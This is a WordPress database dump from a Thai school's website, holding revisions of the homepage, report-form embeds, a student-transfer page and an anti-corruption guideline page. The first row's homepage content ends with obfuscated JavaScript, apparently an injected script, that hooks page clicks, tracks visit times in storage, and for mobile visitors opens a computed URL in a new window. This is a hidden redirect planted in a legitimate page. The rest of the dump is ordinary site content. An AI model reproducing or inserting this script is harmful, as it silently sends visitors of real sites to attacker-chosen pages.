_0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-04 14:32:53','2025-07-04 07:32:53','',14,'http://pakhaeng.ssk.in.th/?p=1688',0,'revision','',0),
(1689,1,'2025-07-04 14:36:56','2025-07-04 07:36:56','<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbyKD8bCjilHAUCjbG1B2khIdnFIGdTpP6PqoXWX27b45AvdDU7h0j03YLDkc8S2OV4y/exec\" width=\"100%\" height=\"1200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->','ระบบรายงานไปราชการ','','inherit','closed','closed','','1684-revision-v1','','','2025-07-04 14:36:56','2025-07-04 07:36:56','',1684,'http://pakhaeng.ssk.in.th/?p=1689',0,'revision','',0),
(1691,1,'2025-07-04 14:50:02','2025-07-04 07:50:02','<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbyKD8bCjilHAUCjbG1B2khIdnFIGdTpP6PqoXWX27b45AvdDU7h0j03YLDkc8S2OV4y/exec\" width=\"100%\" height=\"1200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','ระบบรายงานไปราชการ','','inherit','closed','closed','','1684-revision-v1','','','2025-07-04 14:50:02','2025-07-04 07:50:02','',1684,'http://pakhaeng.ssk.in.th/?p=1691',0,'revision','',0),
(1692,1,'2025-07-04 14:50:03','2025-07-04 07:50:03','<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbyKD8bCjilHAUCjbG1B2khIdnFIGdTpP6PqoXWX27b45AvdDU7h0j03YLDkc8S2OV4y/exec\" width=\"100%\" height=\"1200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','ระบบรายงานไปราชการ','','inherit','closed','closed','','1684-revision-v1','','','2025-07-04 14:50:03','2025-07-04 07:50:03','',1684,'http://pakhaeng.ssk.in.th/?p=1692',0,'revision','',0),
(1695,1,'2025-07-04 16:36:05','2025-07-04 09:36:05','<!-- wp:html -->\n<div style=\"position: relative; width: 100%; height:0; padding-top: 56.2225%;\n padding-bottom: 0; box-shadow: 0 2px 8px 0 rgba(63,69,81,0.16); margin-top: 1.6em; margin-bottom: 0.9em; overflow: hidden;\n border-radius: 8px; will-change: transform;\">\n  <iframe loading=\"lazy\" style=\"position: absolute; width: 100%; height: 100%; top: 0; left: 0; border: none; padding: 0;margin: 0;\"\n    src=\"https://www.canva.com/design/DAGsMQSCplg/_W8Hnus2QNJ9R7t38wIyvQ/view?embed\" allowfullscreen=\"allowfullscreen\" allow=\"fullscreen\">\n  </iframe>\n</div>\n\n<!-- /wp:html -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','ยื่นเรื่องย้ายนักเรียน','','inherit','closed','closed','','1623-revision-v1','','','2025-07-04 16:36:05','2025-07-04 09:36:05','',1623,'http://pakhaeng.ssk.in.th/?p=1695',0,'revision','',0),
(1696,1,'2025-07-04 16:36:48','2025-07-04 09:36:48','<!-- wp:html -->\n<div style=\"position: relative; width: 100%; height:0; padding-top: 56.2225%;\n padding-bottom: 0; box-shadow: 0 2px 8px 0 rgba(63,69,81,0.16); margin-top: 1.6em; margin-bottom: 0.9em; overflow: hidden;\n border-radius: 8px; will-change: transform;\">\n  <iframe loading=\"lazy\" style=\"position: absolute; width: 100%; height: 100%; top: 0; left: 0; border: none; padding: 0;margin: 0;\"\n    src=\"https://www.canva.com/design/DAGsMQSCplg/_W8Hnus2QNJ9R7t38wIyvQ/view?embed\" allowfullscreen=\"allowfullscreen\" allow=\"fullscreen\">\n  </iframe>\n</div>\n\n<!-- /wp:html -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','ยื่นเรื่องย้ายนักเรียน','','inherit','closed','closed','','1623-revision-v1','','','2025-07-04 16:36:48','2025-07-04 09:36:48','',1623,'http://pakhaeng.ssk.in.th/?p=1696',0,'revision','',0),
(1697,1,'2025-07-05 14:44:30','2025-07-05 07:44:30','<!-- wp:image {\"id\":1699,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1-1024x256.png\" alt=\"\" class=\"wp-image-1699\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1698,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf\",\"displayPreview\":true,\"previewHeight\":707} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf\" type=\"application/pdf\" style=\"width:100%;height:707px\" aria-label=\"แนวทางโครงการกิจกรรมการป้องกันการทุจริต\"></object><a id=\"wp-block-file--media-ca4491f7-479c-4ada-8242-a5cac308fa7a\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf\">แนวทางโครงการกิจกรรมการป้องกันการทุจริต</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-ca4491f7-479c-4ada-8242-a5cac308fa7a\">Download</a></div>\n<!-- /wp:file -->','แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต','','publish','closed','closed','','%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%97%e0%b8%b2%e0%b8%87-%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%81%e0%b8%b2','','','2025-07-05 14:44:32','2025-07-05 07:44:32','',0,'http://pakhaeng.ssk.in.th/?page_id=1697',0,'page','',0),
(1698,1,'2025-07-05 14:39:06','2025-07-05 07:39:06','','แนวทางโครงการกิจกรรมการป้องกันการทุจริต','','inherit','','closed','','%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%81%e0%b8%b2','','','2025-07-05 14:39:06','2025-07-05 07:39:06','',1697,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf',0,'attachment','application/pdf',0),
(1699,1,'2025-07-05 14:44:13','2025-07-05 07:44:13','','Is It a Gift Instagram Post (1)','','inherit','','closed','','is-it-a-gift-instagram-post-1-2','','','2025-07-05 14:44:13','2025-07-05 07:44:13','',1697,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1.png',0,'attachment','image/png',0),
(1700,1,'2025-07-05 14:44:30','2025-07-05 07:44:30','<!-- wp:image {\"id\":1699,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1-1024x256.png\" alt=\"\" class=\"wp-image-1699\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1698,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf\",\"displayPreview\":true,\"previewHeight\":707} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf\" type=\"application/pdf\" style=\"width:100%;height:707px\" aria-label=\"แนวทางโครงการกิจกรรมการป้องกันการทุจริต\"></object><a id=\"wp-block-file--media-ca4491f7-479c-4ada-8242-a5cac308fa7a\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf\">แนวทางโครงการกิจกรรมการป้องกันการทุจริต</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-ca4491f7-479c-4ada-8242-a5cac308fa7a\">Download</a></div>\n<!-- /wp:file -->','แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต','','inherit','closed','closed','','1697-revision-v1','','','2025-07-05 14:44:30','2025-07-05 07:44:30','',1697,'http://pakhaeng.ssk.in.th/?p=1700',0,'revision','',0),
(1701,1,'2025-07-05 14:44:32','2025-07-05 07:44:32','<!-- wp:image {\"id\":1699,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1-1024x256.png\" alt=\"\" class=\"wp-image-1699\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1698,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf\",\"displayPreview\":true,\"previewHeight\":707} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf\" type=\"application/pdf\" style=\"width:100%;height:707px\" aria-label=\"แนวทางโครงการกิจกรรมการป้องกันการทุจริต\"></object><a id=\"wp-block-file--media-ca4491f7-479c-4ada-8242-a5cac308fa7a\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf\">แนวทางโครงการกิจกรรมการป้องกันการทุจริต</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-ca4491f7-479c-4ada-8242-a5cac308fa7a\">Download</a></div>\n<!-- /wp:file -->','แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต','','inherit','closed','closed','','1697-revision-v1','','','2025-07-05 14:44:32','2025-07-05 07:44:32','',1697,'http://pakhaeng.ssk.in.th/?p=1701',0,'revision','',0),
(1702,1,'2025-07-05 14:45:26','2025-07-05 07:45:26','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- 